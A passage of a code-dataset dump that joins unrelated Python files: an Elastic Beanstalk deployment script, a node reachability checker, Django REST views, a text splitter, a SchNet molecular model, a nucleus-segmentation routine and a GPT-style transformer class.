            # --- Scaling triggers: average CPU; scale up >85%, down <25% ---
            {
                'Namespace': 'aws:autoscaling:trigger',
                'OptionName': 'BreachDuration',
                'ResourceName': 'AWSEBCloudwatchAlarmLow',
                'Value': '1'
            },
            {
                u'Namespace': 'aws:autoscaling:trigger',
                u'OptionName': 'EvaluationPeriods',
                u'ResourceName': 'AWSEBCloudwatchAlarmLow',
                u'Value': '1'
            },
            {
                u'Namespace': 'aws:autoscaling:trigger',
                u'OptionName': 'LowerBreachScaleIncrement',
                u'ResourceName': 'AWSEBAutoScalingScaleDownPolicy',
                u'Value': '-1'
            },
            {
                u'Namespace': 'aws:autoscaling:trigger',
                u'OptionName': 'LowerThreshold',
                u'ResourceName': 'AWSEBCloudwatchAlarmLow',
                u'Value': '25'
            },
            {
                'Namespace': 'aws:autoscaling:trigger',
                'OptionName': 'MeasureName',
                'ResourceName': 'AWSEBCloudwatchAlarmLow',
                'Value': 'CPUUtilization'
            },
            {
                'Namespace': 'aws:autoscaling:trigger',
                'OptionName': 'Period',
                'ResourceName': 'AWSEBCloudwatchAlarmLow',
                'Value': '1'
            },
            {
                'Namespace': 'aws:autoscaling:trigger',
                'OptionName': 'Statistic',
                'ResourceName': 'AWSEBCloudwatchAlarmLow',
                'Value': 'Average'
            },
            {
                'Namespace': 'aws:autoscaling:trigger',
                'OptionName': 'Unit',
                'ResourceName': 'AWSEBCloudwatchAlarmLow',
                'Value': 'Percent'
            },
            {
                'Namespace': 'aws:autoscaling:trigger',
                'OptionName': 'UpperBreachScaleIncrement',
                'ResourceName': 'AWSEBAutoScalingScaleUpPolicy',
                'Value': '1'
            },
            {
                'Namespace': 'aws:autoscaling:trigger',
                'OptionName': 'UpperThreshold',
                'ResourceName': 'AWSEBCloudwatchAlarmHigh',
                'Value': '85'
            },
            # --- Rolling updates / deployments: 50% batches, 10 min timeout ---
            {
                'Namespace': 'aws:autoscaling:updatepolicy:rollingupdate',
                'OptionName': 'RollingUpdateEnabled',
                'ResourceName': 'AWSEBAutoScalingGroup',
                'Value': 'false'
            },
            {
                'Namespace': 'aws:autoscaling:updatepolicy:rollingupdate',
                'OptionName': 'RollingUpdateType',
                'ResourceName': 'AWSEBAutoScalingGroup',
                'Value': 'Time'
            },
            {
                'Namespace': 'aws:elasticbeanstalk:command',
                'OptionName': 'BatchSize',
                'Value': '50'
            },
            {
                'Namespace': 'aws:elasticbeanstalk:command',
                'OptionName': 'BatchSizeType',
                'Value': 'Percentage'
            },
            {
                'Namespace': 'aws:elasticbeanstalk:command',
                'OptionName': 'DeploymentPolicy',
                'Value': 'Rolling'
            },
            {
                'Namespace': 'aws:elasticbeanstalk:command',
                'OptionName': 'IgnoreHealthCheck',
                'Value': 'false'
            },
            {
                'Namespace': 'aws:elasticbeanstalk:command',
                'OptionName': 'Timeout',
                'Value': '600'
            },
            # --- Python platform: where the WSGI callable lives ---
            {
                'Namespace': 'aws:elasticbeanstalk:container:python',
                'OptionName': 'WSGIPath',
                'Value': application_path
            }
        ]
    )
    return creation_response
def initialize_app():
    """Initialize the current directory as an Elastic Beanstalk application."""
    print("Initializing app (current directory) for Elastic Beanstalk...")
    command = 'eb init --region="us-east-1" -p python {}'.format(app_name)
    process = Popen(command, shell=True, stdin=PIPE, stdout=PIPE)
    _, error = process.communicate()
    if error is not None:
        print("\n==>Error initializing app {}.\n==>{}\n".format(app_name, error))
        exit(1)
    print("Done.")
def deploy_app():
    """Deploy the current directory to the Elastic Beanstalk environment,
    labelling the application version with the latest git tag."""
    print("Deploying app (current directory) to Elastic Beanstalk...")
    command = 'eb deploy --label {} {}'.format(get_latest_tag(), environment_name)
    process = Popen(command, shell=True, stdin=PIPE, stdout=PIPE)
    output, error = process.communicate()
    if error is not None:
        print("\n==>Error deploying app {} to environment {}.\n==>{}\n".format(
            app_name, environment_name, error))
        exit(1)
    print(output)
    print("Done.")
def main():
    """Initialize, create (if needed), wait for, and deploy to the EB environment."""
    if not os.path.exists(eb_directory):
        initialize_app()
    else:
        print("Directory already initialized for Elastic Beanstalk. Skipping.")
    # check if environment has already been created. If so, skip creation
    response = client.describe_environments(
        EnvironmentNames=[
            environment_name,
        ]
    )
    if len(response['Environments']) == 0:
        print('==> Creating environment {}'.format(environment_name))
        create_eb_environment()
    # wait for environment ready state before deploying
    environment_ready = False
    while not environment_ready:
        response = client.describe_environments(
            EnvironmentNames=[
                environment_name,
            ]
        )
        if len(response['Environments']) == 0:
            print("Environment {} does not exist.".format(environment_name))
            exit(1)
        env_status = response['Environments'][0]['Status']
        if env_status == 'Terminated':
            # NOTE(review): terminated environments may stay visible in the
            # API for up to an hour, so bail out instead of waiting forever.
            print('\n==>Environment is in terminated state. \
            It could be visible up to an hour.\n')
            exit(1)
        if env_status != 'Ready':
            # Show a spinner for ~20 seconds before polling again.
            spinner = Spinner("Environment setup still in progress... ")
            for i in range(20):
                spinner.next()
                time.sleep(1)
        else:
            environment_ready = True
            print("Environment ready.")
    deploy_app()
# Script entry point: initialize, create/await the environment, then deploy.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
12844959 | <filename>tripled/stack/node.py
__author__ = 'baohua'
from subprocess import PIPE, Popen
from tripled.common.constants import NODE_ROLES
class Node(object):
    """
    An instance of the server in the stack.
    """
    def __init__(self, ip, role):
        self.ip = ip
        # Unknown role names fall back to the compute role.
        self.role = NODE_ROLES.get(role, NODE_ROLES['compute'])

    def is_reachable(self, dst):
        """
        Return whether the dst node is reachable from this node.

        Sends 3 ICMP echo requests with a 2 second per-packet timeout and
        succeeds only when ping reports 0% packet loss.
        """
        cmd = 'ping %s -c 3 -W 2' % dst.ip
        # universal_newlines so communicate() yields str on Python 3 as well.
        output, error = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True,
                              universal_newlines=True).communicate()
        # Match ' 0% packet loss' with a leading space: the bare substring
        # '0% packet loss' is also contained in '100% packet loss', which
        # would wrongly report an unreachable host as reachable.
        if not error and output and ' 0% packet loss' in output:
            return True
        else:
            return False
class Control(Node):
    """
    An instance of the control node in the stack.
    """
    def __init__(self, ip='127.0.0.1'):
        super(Control, self).__init__(ip, role='control')
class Network(Node):
    """
    An instance of the network node in the stack.
    """
    def __init__(self, ip='127.0.0.1'):
        super(Network, self).__init__(ip, role='network')
class Compute(Node):
    """
    An instance of the compute node in the stack.
    """
    def __init__(self, ip='127.0.0.1'):
        super(Compute, self).__init__(ip, role='compute')
# Run the doctests embedded in this module when executed directly.
if __name__ == '__main__':
    import doctest
    doctest.testmod()
| StarcoderdataPython |
1770963 | from django.shortcuts import render
from django.shortcuts import render, redirect
from services.models import Service
from rest_framework.views import APIView
from django.http import JsonResponse
# Create your views here.
class AllServicesAPI(APIView):
    """Read-only endpoint returning every Service record as JSON."""
    def get(self, request, *args, **kwargs):
        # Materialize the queryset into plain dicts so it is JSON-serializable.
        services = list(Service.objects.values())
        return JsonResponse({'services': services})
class ServiceHandlerAPI(APIView):
    """POST endpoint for a single service.

    NOTE(review): despite the singular name, this currently returns ALL
    Service records; the per-link/per-user filtering is commented out below
    — confirm intended behavior before relying on it.
    """
    def post(self, request, *args, **kwargs):
        # link = kwargs.get('link')
        # user = request.GET.get('user')
        service = list(Service.objects.values())
        return JsonResponse({'service': service})
# class CurrentUserView(APIView):
# def get(self, request):
# serializer = UserSerializer(request.user)
# return JsonResponse(serializer.data)
| StarcoderdataPython |
9696098 | <filename>src/service_framework/connections/__init__.py
""" Something whitty """
| StarcoderdataPython |
118744 | import string
class StringSplitter:
    """Split lowercased, punctuation-stripped text into fixed-size word groups.

    Apostrophes and hyphens are preserved; all other punctuation marks and
    digits are removed before grouping.
    """

    def __init__(self, text):
        self.string = text.lower()
        self.string_list = []
        self.bad = set()
        # Bug fix: the original condition `punct != "'" or punct != "-"` is a
        # tautology (always True), so apostrophes and hyphens were stripped
        # even though the intent was clearly to keep them.
        for punct in string.punctuation:
            if punct not in ("'", "-"):
                self.bad.add(punct)
        for num in '1234567890':
            self.bad.add(num)

    def string_splitter(self, words_a_string):
        """Fill self.string_list with groups of `words_a_string` words each.

        A trailing partial group (fewer than `words_a_string` words) is kept.
        """
        clean = self._strip_bad_chars()
        words = clean.split(' ')
        count = 0
        big_string = ''
        for i in range(len(words)):
            if count == words_a_string - 1:
                count = 0
                big_string += words[i]
                self.string_list.append(big_string)
                big_string = ''
            else:
                big_string += words[i] + " "
                count += 1
        # Bug fix: the original silently dropped the final partial group when
        # len(words) was not a multiple of words_a_string.
        if big_string:
            self.string_list.append(big_string.rstrip())

    def _strip_bad_chars(self):
        """Return self.string with every character in self.bad removed."""
        return ''.join(ch for ch in self.string if ch not in self.bad)

    def show_list(self):
        """Return the accumulated list of word groups."""
        return self.string_list
if __name__ == "__main__":
s = StringSplitter('Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed accumsan libero neque, nec viverra quam egestas in. Vivamus id egestas mauris, eu commodo arcu. Curabitur est eros, blandit quis nulla sed, viverra sodales risus. Sed in tellus porta, volutpat est ut, ullamcorper purus. Praesent tincidunt erat at dapibus aliquet. Maecenas et convallis lorem, vitae ultricies metus. Ut at quam ultrices, gravida mi non, vehicula urna. Quisque aliquet facilisis ligula, ut vestibulum dolor rhoncus sed. Quisque interdum lacus ut vulputate venenatis. In non turpis leo. Aenean id semper tortor, id rutrum neque. Fusce posuere, tortor non tristique luctus, velit turpis molestie augue, non eleifend sem tortor sed odio. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Donec quis erat in odio vulputate fringilla eget eu velit. Etiam eleifend dui est, porta commodo dui mollis vel.')
s.string_splitter(10)
print(s.show_list())
| StarcoderdataPython |
3386944 | <reponame>banerjeesujan/leetcode<filename>Interviewbit/MyMath/IB_Math_FizzBuzz.py<gh_stars>0
import time
class Solution:
    """Three equivalent FizzBuzz implementations.

    Each returns, for 1..A inclusive, 'Fizz' for multiples of 3, 'Buzz' for
    multiples of 5, 'FizzBuzz' for multiples of both, else str(i).
    """

    def fizzBuzz(self, A):
        """Straightforward per-number test."""
        out = []
        for n in range(1, A + 1):
            word = ("Fizz" if n % 3 == 0 else "") + ("Buzz" if n % 5 == 0 else "")
            out.append(word or str(n))
        return out

    def fizzBuzz2(self, A):
        """Sieve-style: mark multiples first, then translate the marks."""
        marks = [0] * (A + 1)
        for step in (3, 5):
            for i in range(step, A + 1, step):
                marks[i] += step
        # 0 -> plain number, 3 -> Fizz, 5 -> Buzz, 8 (= 3 + 5) -> FizzBuzz
        names = {3: 'Fizz', 5: 'Buzz', 8: 'FizzBuzz'}
        return [names.get(marks[i], str(i)) for i in range(1, A + 1)]

    def fizzBuzz3(self, A):
        """Overwrite-in-place: start from the numbers, then stamp the words."""
        res = [str(n) for n in range(1, A + 1)]
        for step, word in ((3, 'Fizz'), (5, 'Buzz'), (15, 'FizzBuzz')):
            for i in range(step, A + 1, step):
                res[i - 1] = word
        return res
# Benchmark driver: times fizzBuzz3 on half a million numbers.
# NOTE: prints the entire 500000-element list before reporting the elapsed time.
start_time = time.perf_counter()
A = 500000
s = Solution()
print(s.fizzBuzz3(A))
end_time = time.perf_counter()
print(end_time - start_time) # 0.054255205 # 0.05325494
| StarcoderdataPython |
124700 | <reponame>semodi/champs-scalar-coupling<gh_stars>0
import schnetpack as spk
from schnetpack.data import Structure
import torch
from torch import nn
import numpy as np
import schnetpack
class EdgeUpdate(nn.Module):
    """Learned update of pairwise edge features from the two endpoint atom embeddings.

    The edge feature f_ij is concatenated with the embeddings of both atoms of
    the pair and passed through a two-layer shifted-softplus MLP that maps back
    to the spatial-basis width, so the updated edges can feed the next
    interaction block.
    """
    def __init__(self, n_atom_basis, n_spatial_basis):
        # Input: [f_ij | x_j | x_i] -> hidden -> n_spatial_basis output.
        super(EdgeUpdate, self).__init__()
        self.dense1 = spk.nn.base.Dense(2 * n_atom_basis + n_spatial_basis,
        n_atom_basis + n_spatial_basis,activation = spk.nn.activations.shifted_softplus)
        self.dense2 = spk.nn.base.Dense(n_atom_basis + n_spatial_basis,
        n_spatial_basis, activation = spk.nn.activations.shifted_softplus)
        self.update_network = nn.Sequential(self.dense1, self.dense2)
    def forward(self, x, neighbors, f_ij):
        """Return updated edge features.

        Args (assumed shapes — TODO confirm against SchNet conventions):
            x: (batch, n_atoms, n_atom_basis) atom embeddings.
            neighbors: (batch, n_atoms, n_neighbors) neighbor indices.
            f_ij: (batch, n_atoms, n_neighbors, n_spatial_basis) edge features.
        """
        # # calculate filter
        # W = self.filter_network(f_ij)
        # # apply optional cutoff
        # if self.cutoff_network is not None:
        # C = self.cutoff_network(r_ij)
        # # print(C)
        # W *= C
        nbh_size = neighbors.size()
        # Gather the embedding of each neighbor atom j for every pair (i, j).
        nbh = neighbors.view(-1, nbh_size[1] * nbh_size[2], 1)
        nbh = nbh.expand(-1, -1, x.size(2))
        x_gath = torch.gather(x, 1, nbh)
        x_gath = x_gath.view(nbh_size[0], nbh_size[1], nbh_size[2], -1)
        # Broadcast the central atom i's embedding across its neighbor axis.
        x_gath0 = torch.unsqueeze(x, 2).expand(-1,-1, nbh_size[2], -1).clone()
        # Concatenate [f_ij | x_j | x_i] and run the update MLP.
        f_ij = torch.cat([f_ij, x_gath, x_gath0], dim = -1)
        f_ij = self.update_network(f_ij)
        return f_ij
class ShrinkSchNet(spk.representation.SchNet):
    """SchNet variant whose final `shrink_layers` interaction blocks see a
    progressively shrinking neighborhood (one cutoff per layer, taken from
    `shrink_distances`), with optional learned edge updates between blocks.
    """

    def __init__(self, n_atom_basis=128, n_filters=128, n_interactions=1, cutoff=5.0, n_gaussians=25,
                 normalize_filter=False, coupled_interactions=False,
                 return_intermediate=False, max_z=100, interaction_block=spk.representation.SchNetInteraction,
                 edgeupdate_block=EdgeUpdate, trainable_gaussians=False,
                 distance_expansion=None, shrink_layers=3, shrink_distances=None):
        # The shrinking layers are appended on top of the requested interactions.
        n_interactions += shrink_layers
        if shrink_distances:
            # NOTE(review): when shrink_distances is given its length overrides
            # shrink_layers for iteration, but n_interactions was already grown
            # by the shrink_layers argument — confirm callers keep them equal.
            self.shrink_layers = len(shrink_distances)
        else:
            self.shrink_layers = shrink_layers
        self.shrink_distances = shrink_distances
        super(ShrinkSchNet, self).__init__(n_atom_basis, n_filters, n_interactions, cutoff, n_gaussians,
                                           normalize_filter, coupled_interactions,
                                           return_intermediate, max_z, interaction_block, trainable_gaussians,
                                           distance_expansion)
        if edgeupdate_block is None:
            self.edge_update = False
            self.edgeupdates = [None] * n_interactions
        else:
            self.edge_update = True
            if coupled_interactions:
                # Share one edge-update module across all interactions.
                self.edgeupdates = nn.ModuleList([
                    edgeupdate_block(n_atom_basis=n_atom_basis,
                                     n_spatial_basis=n_gaussians)
                ] * n_interactions)
            else:
                self.edgeupdates = nn.ModuleList([
                    edgeupdate_block(n_atom_basis=n_atom_basis, n_spatial_basis=n_gaussians)
                    for _ in range(n_interactions)
                ])

    def forward(self, inputs):
        """Compute atom representations; returns (batch, 2, n_atom_basis) for the
        two unmasked atoms per sample (assumes exactly two — TODO confirm).
        """
        atomic_numbers = inputs[Structure.Z]
        positions = inputs[Structure.R]
        cell = inputs[Structure.cell]
        cell_offset = inputs[Structure.cell_offset]
        neighbors = inputs[Structure.neighbors]
        neighbor_mask = inputs[Structure.neighbor_mask]
        atom_mask = inputs[Structure.atom_mask]
        # atom embedding
        x = self.embedding(atomic_numbers)
        # spatial features
        r_ij = self.distances(positions, neighbors, cell, cell_offset)
        f_ij = self.distance_expansion(r_ij)
        # Pairwise atom-validity mask with the diagonal (self-pairs) removed.
        nodiagmask = torch.stack([~torch.eye(atom_mask.size()[1]).byte()]*len(atom_mask))
        atom_mask_mat = \
            torch.einsum('ij,ik -> ijk', atom_mask, atom_mask)[nodiagmask].view(len(atom_mask),atom_mask.size()[1],-1)
        zero_mask = torch.zeros_like(r_ij)
        if self.return_intermediate:
            xs = [x]
        # Regular (non-shrinking) interaction blocks.
        for eupdate, interaction in zip(self.edgeupdates[:-self.shrink_layers],
                                        self.interactions[:-self.shrink_layers]):
            if self.edge_update:
                f_ij = eupdate(x, neighbors, f_ij)
                f_ij = f_ij * neighbor_mask.unsqueeze(-1).expand(-1,-1,-1, f_ij.size()[-1])
            v = interaction(x, r_ij, neighbors, neighbor_mask, f_ij=f_ij)
            x = x + v
            if self.return_intermediate:
                # Bug fix: original did xs.append(xs), appending the list to itself.
                xs.append(x)
        # Shrinking blocks: progressively drop neighbors beyond each cutoff.
        for eupdate, interaction, co_dist in zip(self.edgeupdates[-self.shrink_layers:],
                                                 self.interactions[-self.shrink_layers:],
                                                 self.shrink_distances):
            if self.edge_update:
                f_ij = eupdate(x, neighbors, f_ij)
                f_ij = f_ij * neighbor_mask.unsqueeze(-1).expand(-1,-1,-1, f_ij.size()[-1])
            # Invalid pairs get +10 pushed off the distance so they never pass the cutoff.
            neighbor_mask = torch.where(r_ij - (10 * atom_mask_mat) < co_dist, neighbor_mask, zero_mask)
            v = interaction(x, r_ij, neighbors, neighbor_mask, f_ij=f_ij)
            x = x + v
            if self.return_intermediate:
                # Bug fix: original did xs.append(xs), appending the list to itself.
                xs.append(x)
        if self.return_intermediate:
            return x, xs
        return x[atom_mask.byte()].view(len(atom_mask),2,-1)
class SCReadout(nn.Module):
    """Scalar-coupling readout: a GRU run over the atom pair in both orders,
    followed by an MLP and a mean/std rescaling; returns {'y': prediction}.
    """

    def __init__(self, embed_dim=128, hidden_dim=128, mlp_layers=3, mean=None, stddev=None):
        super(SCReadout, self).__init__()
        self.embed_dim = embed_dim
        self.gru = nn.GRU(input_size=embed_dim,
                          hidden_size=hidden_dim,
                          batch_first=True)
        self.mlp = spk.nn.blocks.MLP(hidden_dim, 1, n_layers=mlp_layers)
        self.requires_dr = False
        if mean is None:
            mean = torch.FloatTensor([0.0])
        if stddev is None:
            stddev = torch.FloatTensor([1.0])
        self.standardize = spk.nn.base.ScaleShift(mean, stddev)

    def forward(self, inputs):
        emb = inputs['representation']
        # Run the GRU over the pair in both orders; summing the final hidden
        # states makes the readout order-invariant.
        fwd_hidden = self.gru(emb)[1]
        rev_hidden = self.gru(emb[:, [1, 0]])[1]
        combined = (fwd_hidden + rev_hidden)[0]
        out = self.standardize(self.mlp(combined))
        return {'y': out}
| StarcoderdataPython |
8074773 | from typing import Optional
import histomicstk as htk
import numpy as np
import scipy as sp
import skimage.color
import skimage.io
import skimage.measure
from anndata import AnnData
from scipy import ndimage as ndi
from skimage.feature import peak_local_max
from skimage.segmentation import watershed
from tqdm import tqdm
def morph_watershed(
    adata: AnnData,
    library_id: str = None,
    verbose: bool = False,
    copy: bool = False,
) -> Optional[AnnData]:
    """\
    Watershed method to segment nuclei and calculate morphological statistics
    Parameters
    ----------
    adata
        Annotated data matrix.
    library_id
        Library id stored in AnnData.
    copy
        Return a copy instead of writing to adata.
    Returns
    -------
    Depending on `copy`, returns or updates `adata` with the following fields.
    **n_nuclei** : `adata.obs` field
        saved number of nuclei of each spot image tiles
    **nuclei_total_area** : `adata.obs` field
        saved total area of nuclei of each spot image tiles
    **nuclei_mean_area** : `adata.obs` field
        saved mean area of nuclei of each spot image tiles
    **nuclei_std_area** : `adata.obs` field
        saved standard deviation of nuclei area of each spot image tiles
    **eccentricity** : `adata.obs` field
        saved eccentricity of each spot image tiles
    **mean_pix_r** : `adata.obs` field
        saved mean pixel value of red channel of each spot image tiles
    **std_pix_r** : `adata.obs` field
        saved standard deviation of red channel of each spot image tiles
    **mean_pix_g** : `adata.obs` field
        saved mean pixel value of green channel of each spot image tiles
    **std_pix_g** : `adata.obs` field
        saved standard deviation of green channel of each spot image tiles
    **mean_pix_b** : `adata.obs` field
        saved mean pixel value of blue channel of each spot image tiles
    **std_pix_b** : `adata.obs` field
        saved standard deviation of blue channel of each spot image tiles
    **nuclei_total_area_per_tile** : `adata.obs` field
        saved total nuclei area per tile of each spot image tiles
    """
    if library_id is None:
        # Default to the first spatial library stored in the AnnData object.
        library_id = list(adata.uns["spatial"].keys())[0]
    n_nuclei_list = []
    nuclei_total_area_list = []
    nuclei_mean_area_list = []
    nuclei_std_area_list = []
    eccentricity_list = []
    mean_pix_list_r = []
    std_pix_list_r = []
    mean_pix_list_g = []
    std_pix_list_g = []
    mean_pix_list_b = []
    std_pix_list_b = []
    with tqdm(
        total=len(adata),
        desc="calculate morphological stats",
        bar_format="{l_bar}{bar} [ time left: {remaining} ]",
    ) as pbar:
        # One segmentation + stats pass per spot tile image on disk.
        for tile in adata.obs["tile_path"]:
            (
                n_nuclei,
                nuclei_total_area,
                nuclei_mean_area,
                nuclei_std_area,
                eccentricity,
                solidity,  # NOTE(review): computed but discarded — never stored in adata.obs
                mean_pix_r,
                std_pix_r,
                mean_pix_g,
                std_pix_g,
                mean_pix_b,
                std_pix_b,
            ) = _calculate_morph_stats(tile)
            n_nuclei_list.append(n_nuclei)
            nuclei_total_area_list.append(nuclei_total_area)
            nuclei_mean_area_list.append(nuclei_mean_area)
            nuclei_std_area_list.append(nuclei_std_area)
            eccentricity_list.append(eccentricity)
            mean_pix_list_r.append(mean_pix_r)
            std_pix_list_r.append(std_pix_r)
            mean_pix_list_g.append(mean_pix_g)
            std_pix_list_g.append(std_pix_g)
            mean_pix_list_b.append(mean_pix_b)
            std_pix_list_b.append(std_pix_b)
            pbar.update(1)
    adata.obs["n_nuclei"] = n_nuclei_list
    adata.obs["nuclei_total_area"] = nuclei_total_area_list
    adata.obs["nuclei_mean_area"] = nuclei_mean_area_list
    adata.obs["nuclei_std_area"] = nuclei_std_area_list
    adata.obs["eccentricity"] = eccentricity_list
    adata.obs["mean_pix_r"] = mean_pix_list_r
    adata.obs["std_pix_r"] = std_pix_list_r
    adata.obs["mean_pix_g"] = mean_pix_list_g
    adata.obs["std_pix_g"] = std_pix_list_g
    adata.obs["mean_pix_b"] = mean_pix_list_b
    adata.obs["std_pix_b"] = std_pix_list_b
    # NOTE(review): 299 * 299 hard-codes the tile size (Inception input size?) — confirm.
    adata.obs["nuclei_total_area_per_tile"] = adata.obs["nuclei_total_area"] / 299 / 299
    return adata if copy else None
def _calculate_morph_stats(tile_path):
    """Segment nuclei in a single tile and return summary statistics.

    Pipeline: Macenko stain deconvolution -> Otsu threshold on the
    hematoxylin channel -> distance-transform watershed -> region properties.

    Returns
    -------
    tuple
        (n_nuclei, nuclei_total_area, nuclei_mean_area, nuclei_std_area,
        eccentricity, solidity, mean_r, std_r, mean_g, std_g, mean_b, std_b)
    """
    imInput = skimage.io.imread(tile_path)
    stain_color_map = htk.preprocessing.color_deconvolution.stain_color_map
    stains = [
        "hematoxylin",  # nuclei stain
        "eosin",  # cytoplasm stain
        "null",
    ]  # set to null if input contains only two stains
    w_est = htk.preprocessing.color_deconvolution.rgb_separate_stains_macenko_pca(
        imInput, 255
    )
    # Perform color deconvolution
    deconv_result = htk.preprocessing.color_deconvolution.color_deconvolution(
        imInput, w_est, 255
    )
    channel = htk.preprocessing.color_deconvolution.find_stain_index(
        stain_color_map[stains[0]], w_est
    )
    im_nuclei_stain = deconv_result.Stains[:, :, channel]
    thresh = skimage.filters.threshold_otsu(im_nuclei_stain)
    # Foreground = darker-than-0.8*Otsu nuclei stain, with holes filled.
    # (scipy.ndimage.morphology namespace is deprecated; call binary_fill_holes
    # from scipy.ndimage directly.)
    im_fgnd_mask = sp.ndimage.binary_fill_holes(
        im_nuclei_stain < 0.8 * thresh
    )
    # Watershed seeded at local maxima of the distance transform.
    distance = ndi.distance_transform_edt(im_fgnd_mask)
    coords = peak_local_max(distance, footprint=np.ones((3, 3)), labels=im_fgnd_mask)
    mask = np.zeros(distance.shape, dtype=bool)
    mask[tuple(coords.T)] = True
    markers, _ = ndi.label(mask)
    labels = watershed(im_nuclei_stain, markers, mask=im_fgnd_mask)
    min_nucleus_area = 60
    # Bug fix: np.int was removed in NumPy 1.24; use the builtin int dtype.
    im_nuclei_seg_mask = htk.segmentation.label.area_open(
        labels, min_nucleus_area
    ).astype(int)
    # compute nuclei properties
    objProps = skimage.measure.regionprops(im_nuclei_seg_mask)
    n_nuclei = len(objProps)
    nuclei_total_area = sum(map(lambda x: x.area, objProps))
    nuclei_mean_area = np.mean(list(map(lambda x: x.area, objProps)))
    nuclei_std_area = np.std(list(map(lambda x: x.area, objProps)))
    # Bug fix: per-channel statistics on an (H, W, 3) RGB image require
    # reshape(-1, 3).mean(0); the original reshape(3, -1).mean(1) mixed
    # pixels across channels and produced meaningless values.
    flat_pixels = imInput.reshape(-1, 3)
    mean_pix = flat_pixels.mean(0)
    std_pix = flat_pixels.std(0)
    eccentricity = np.mean(list(map(lambda x: x.eccentricity, objProps)))
    solidity = np.mean(list(map(lambda x: x.solidity, objProps)))
    return (
        n_nuclei,
        nuclei_total_area,
        nuclei_mean_area,
        nuclei_std_area,
        eccentricity,
        solidity,
        mean_pix[0],
        std_pix[0],
        mean_pix[1],
        std_pix[1],
        mean_pix[2],
        std_pix[2],
    )
| StarcoderdataPython |
1654632 | import torch
import torch.nn.functional as F
from ..models.mingpt import GPT, CGPT, NoiseInjection
from tools.utils import to_cuda
from models import load_network, save_network, print_network
from tqdm import tqdm
from ..modules.vmf import nll_vMF
class Transformer(torch.nn.Module):
    def __init__(self, opt, is_train=True, is_main=True, logger=None):
        """Build the GPT backbone (and its optimizer when training).

        opt: experiment options object (z_shape, state_size, lr, ...).
        is_main: only the main process loads weights and logs.
        """
        super().__init__()
        self.opt = opt
        self.is_main = is_main
        # Network must exist before the optimizer is created from its parameters.
        self.net_t = self.initialize_networks(is_train)
        if is_train:
            self.opt_t = self.create_optimizers(self.opt)
        self.logger = logger if self.is_main else None
        height, width = self.opt.z_shape
        # Tokens per frame, per state block, and per frame+state group.
        self.size = height * width
        self.state_size = self.opt.state_size
        self.tot_size = self.size + self.state_size
def forward(self, data, prefix='', mode='', total_len=None, log=False, global_iter=None, show_progress=False):
code, state_code, cond_code, delta_length_cond, vid_lbl = self.preprocess_input(data)
if mode == 'transformer':
t_loss = self.compute_transformer_loss(code, state_code, cond_code, delta_length_cond, vid_lbl, prefix, log, global_iter)
return t_loss
if mode == 'eval_transformer':
with torch.no_grad():
t_loss = self.compute_transformer_loss(code, log, global_iter, is_eval=True)
return t_loss
if mode == 'inference':
return self.generate_fake(code, state_code, cond_code, delta_length_cond, vid_lbl, total_len, show_progress)
else:
raise ValueError(f"mode '{mode}' is invalid")
def preprocess_input(self, data):
data["code"] = to_cuda(data, "code", flatten_empty=False)
data["state_code"] = to_cuda(data, "state_code", flatten_empty=False)
data["cond_code"] = to_cuda(data, "cond_code")
data["vid_lbl"] = to_cuda(data, "vid_lbl")
data["delta_length_cond"] = to_cuda(data, "delta_length_cond")
return data["code"], data["state_code"], data["cond_code"], data["delta_length_cond"], data["vid_lbl"]
    def initialize_networks(self, is_train):
        """Instantiate the continuous (CGPT) or discrete (GPT) backbone on GPU.

        is_train is currently unused; weights are loaded only on the main process.
        """
        if self.opt.is_continuous:
            net_t = CGPT(n_proposals=self.opt.n_proposals, block_size=self.opt.z_len, n_layer=self.opt.n_layer,
                         n_head=self.opt.n_head, n_embd=self.opt.n_embd, n_in=self.opt.n_in,
                         resid_noise=self.opt.resid_noise).cuda()
        else:
            # Size of the class-conditional label embedding, if categories are used.
            num_lbl = len(self.opt.categories) if self.opt.categories is not None else None
            net_t = GPT(vocab_size=self.opt.z_num, block_size=self.opt.z_len, n_layer=self.opt.n_layer,
                        n_head=self.opt.n_head, n_embd=self.opt.n_embd, emb_mode=self.opt.emb_mode,
                        shape=self.opt.z_shape, state_vocab_size=self.opt.state_num, num_blocks=self.opt.num_blocks,
                        state_size=self.opt.state_size, use_start_token=self.opt.use_start_token, use_lbl=self.opt.cat,
                        num_lbl=num_lbl, state_front=self.opt.state_front).cuda()
        if self.is_main:
            # NOTE(review): checkpoint is loaded only on the main process —
            # presumably weights are synced elsewhere; confirm for DDP.
            net_t = load_network(net_t, "transformer_t", self.opt, head_to_n=self.opt.head_to_n)
        return net_t
    def save_model(self, global_iter, latest=False, best=False):
        """Persist the transformer weights via the shared save_network helper."""
        save_network(self.net_t, "transformer_t", global_iter, self.opt, latest, best)
# Following minGPT:
# This long function is unfortunately doing something very simple and is being very defensive:
# We are separating out all parameters of the model into two buckets: those that will experience
# weight decay for regularization and those that won't (biases, and layernorm/embedding weights).
# We are then returning the PyTorch optimizer object.
    def create_optimizers(self, opt):
        """Build the AdamW optimizer, splitting parameters into weight-decayed
        (Linear weights) and non-decayed (biases, LayerNorm/Embedding/noise
        weights, positional embeddings) groups, with optional head-only or
        reduced-lr finetuning.
        """
        param_dict = {pn: p for pn, p in self.net_t.named_parameters()}
        if opt.finetune_head and opt.finetune_f is None:
            # Head-only finetuning: optimize nothing but the output projection.
            optim_groups = [{"params": [param_dict["head.weight"]], "weight_decay": 0.01, "lr": opt.lr}]
        else:
            # separate out all parameters to those that will and won't experience regularizing weight decay
            decay = set()
            no_decay = set()
            whitelist_weight_modules = (torch.nn.Linear,)
            blacklist_weight_modules = (torch.nn.LayerNorm, torch.nn.Embedding, NoiseInjection)
            for mn, m in self.net_t.named_modules():
                for pn, p in m.named_parameters():
                    fpn = '%s.%s' % (mn, pn) if mn else pn # full param name
                    if pn.endswith('bias'):
                        # all biases will not be decayed
                        no_decay.add(fpn)
                    elif pn.endswith('weight') and isinstance(m, whitelist_weight_modules):
                        # weights of whitelist modules will be weight decayed
                        decay.add(fpn)
                    elif pn.endswith('weight') and isinstance(m, blacklist_weight_modules):
                        # weights of blacklist modules will NOT be weight decayed
                        no_decay.add(fpn)
            # special case the position embedding parameter in the root GPT module as not decayed
            no_decay.add('start_tok_emb') if 'start_tok_emb' in param_dict.keys() else None
            no_decay.add('pos_emb') if 'pos_emb' in param_dict.keys() else None
